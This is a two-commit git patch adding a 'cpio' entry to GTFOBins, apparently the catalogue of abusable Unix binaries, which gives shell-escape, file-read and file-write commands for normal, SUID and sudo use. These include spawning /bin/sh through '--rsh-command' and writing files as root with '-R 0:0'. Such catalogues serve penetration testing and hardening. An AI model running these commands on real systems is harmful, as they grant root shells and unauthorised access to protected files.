From 6f2c00168730c40cc3658761b3dba9d3037d4008 Mon Sep 17 00:00:00 2001 From: kiranghimire Date: Sat, 6 Mar 2021 21:51:42 +0545 Subject: [PATCH 1/2] Added cpio --- _gtfobins/cpio.yml | 38 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 _gtfobins/cpio.yml diff --git a/_gtfobins/cpio.yml b/_gtfobins/cpio.yml new file mode 100644 index 0000000..ce84476 --- /dev/null +++ b/_gtfobins/cpio.yml @@ -0,0 +1,38 @@ +--- +description: This reads the contents of file or overwrite to or from the subjected place. +functions: + file-read: + - code: | + LFILE=file_to_read_or_to_save + LFOLDER=folder_location_to_read_or_to_save + touch file.txt + FOLDER=folder_where_file.txt_is_saved + echo $LFILE > /$FOLDER/file.txt + cd /$LFOLDER && cpio -o < /$FOLDER/file.txt + suid: + - code: | + LFILE=file_to_read_or_to_save + LFOLDER=folder_location_to_read_or_to_save + touch file.txt + FOLDER=folder_where_file.txt_is_saved + echo $LFILE > /$FOLDER/file.txt + cd /$LFOLDER && cpio -o < /$FOLDER/file.txt + + # FILE to overwrite + cpio -p /$DFOLDER/ < /$FOLDER/file.txt + sudo: + - code: | + LFILE=file_to_read_or_to_save + LFOLDER=folder_location_to_read_or_to_save + touch file.txt + FOLDER=folder_where_file.txt_is_saved + echo $LFILE > /$FOLDER/file.txt + cd /$LFOLDER && cpio -o < /$FOLDER/file.txt + + # FILE to overwrite + cpio -p /$DFOLDER/ < /$FOLDER/file.txt +--- + + + + From d63982dea98046c3adaae7eb7fc524f185491922 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 7 Mar 2021 12:24:02 +0100 Subject: [PATCH 2/2] Simplify and add file-write and shell --- _gtfobins/cpio.yml | 78 ++++++++++++++++++++++++++++------------------ 1 file changed, 47 insertions(+), 31 deletions(-) diff --git a/_gtfobins/cpio.yml b/_gtfobins/cpio.yml index ce84476..7828004 100644 --- a/_gtfobins/cpio.yml +++ b/_gtfobins/cpio.yml @@ -1,38 +1,54 @@ --- -description: This reads the contents of file or overwrite to or from the subjected place. functions: + shell: + - code: | + echo '/bin/sh /dev/tty' >localhost + cpio -o --rsh-command /bin/sh -F localhost: file-read: - - code: | - LFILE=file_to_read_or_to_save - LFOLDER=folder_location_to_read_or_to_save - touch file.txt - FOLDER=folder_where_file.txt_is_saved - echo $LFILE > /$FOLDER/file.txt - cd /$LFOLDER && cpio -o < /$FOLDER/file.txt + - description: The content of the file is printed to standard output, between the cpio archive format header and footer. + code: | + LFILE=file_to_read + echo "$LFILE" | cpio -o + - description: The whole directory structure is copied to `$TF`. + code: | + LFILE=file_to_read + TF=$(mktemp -d) + echo "$LFILE" | cpio -dp $TF + cat "$TF/$LFILE" + file-write: + - description: Copies `$LFILE` to the `$LDIR` directory. + code: | + LFILE=file_to_write + LDIR=where_to_write + echo DATA >$LFILE + echo $LFILE | cpio -up $LDIR suid: - - code: | - LFILE=file_to_read_or_to_save - LFOLDER=folder_location_to_read_or_to_save - touch file.txt - FOLDER=folder_where_file.txt_is_saved - echo $LFILE > /$FOLDER/file.txt - cd /$LFOLDER && cpio -o < /$FOLDER/file.txt - - # FILE to overwrite - cpio -p /$DFOLDER/ < /$FOLDER/file.txt + - description: The whole directory structure is copied to `$TF`. + code: | + LFILE=file_to_read + TF=$(mktemp -d) + echo "$LFILE" | ./cpio -R $UID -dp $TF + cat "$TF/$LFILE" + - description: Copies `$LFILE` to the `$LDIR` directory. + code: | + LFILE=file_to_write + LDIR=where_to_write + echo DATA >$LFILE + echo $LFILE | ./cpio -R 0:0 -p $LDIR sudo: - code: | - LFILE=file_to_read_or_to_save - LFOLDER=folder_location_to_read_or_to_save - touch file.txt - FOLDER=folder_where_file.txt_is_saved - echo $LFILE > /$FOLDER/file.txt - cd /$LFOLDER && cpio -o < /$FOLDER/file.txt - - # FILE to overwrite - cpio -p /$DFOLDER/ < /$FOLDER/file.txt + echo '/bin/sh /dev/tty' >localhost + sudo cpio -o --rsh-command /bin/sh -F localhost: + - description: The whole directory structure is copied to `$TF`. + code: | + LFILE=file_to_read + TF=$(mktemp -d) + echo "$LFILE" | sudo cpio -R $UID -dp $TF + cat "$TF/$LFILE" + - description: Copies `$LFILE` to the `$LDIR` directory. + code: | + LFILE=file_to_write + LDIR=where_to_write + echo DATA >$LFILE + echo $LFILE | sudo cpio -R 0:0 -p $LDIR --- - - - -